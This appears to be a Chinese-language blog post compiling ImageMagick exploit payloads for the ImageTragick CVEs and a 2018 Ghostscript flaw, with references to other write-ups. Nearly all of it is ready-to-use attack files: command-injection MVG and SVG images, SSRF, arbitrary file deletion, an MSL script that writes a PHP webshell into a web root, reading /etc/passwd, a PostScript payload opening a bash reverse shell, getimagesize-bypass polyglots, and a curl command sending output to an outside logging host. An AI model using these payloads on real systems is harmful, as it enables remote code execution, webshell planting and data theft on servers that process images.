ImageMagick exp

未分类 Admin 2个月前 (07-03) 75次浏览 0个评论

引用:https://www.exploit-db.com/exploits/39767

CVE-2016-3714 RCE 分析

exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context

exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg"|ls "-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

 

CVE-2016-3718 无回显SSRF

ssrf.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

 

CVE-2016-3715 利用ephemeral伪协议任意文件删除

delete_file.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context

 

CVE-2016-3716 利用msl伪协议读写文件(将图片马转为php马)

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

 

CVE-2016-3717 利用 label伪协议读取本地文件

file_read.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@etc/passwd'
pop graphic-context

 

CVE-2018-16509  imagemagick+GhostScript反弹shell

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/监听ip/8080 0>&1') currentdevice putdeviceprops

 

 

补充:绕过getimagesize限制  

假如对图片大小用getimagesize进行了限制,之前爆出来的那些POC均无法通过校验,因为getimagesize并不支持类似PostScript、MVG这样的图片格式。

这时候我们怎么绕过这个限制呢?

poc.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|"`id`)'
pop graphic-context
#define xlogo_width 200
#define xlogo_height 200

 

 

poc.gif

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
 
/test {
#define xlogo64_width 64
#define xlogo64_height 64
}

 

参考:

https://www.anquanke.com/post/id/164819

https://www.freebuf.com/vuls/189776.html

https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html

https://hackerone.com/reports/403417

 

https://www.freebuf.com/vuls/125613.html    (看我如何发现Facebook的ImageMagick漏洞并获得4万美元赏金#dns探测)

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60curl "http://dnslog/" -d @- > /dev/null`'
pop graphic-context

tips:cat/proc/version | base64

喜欢 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址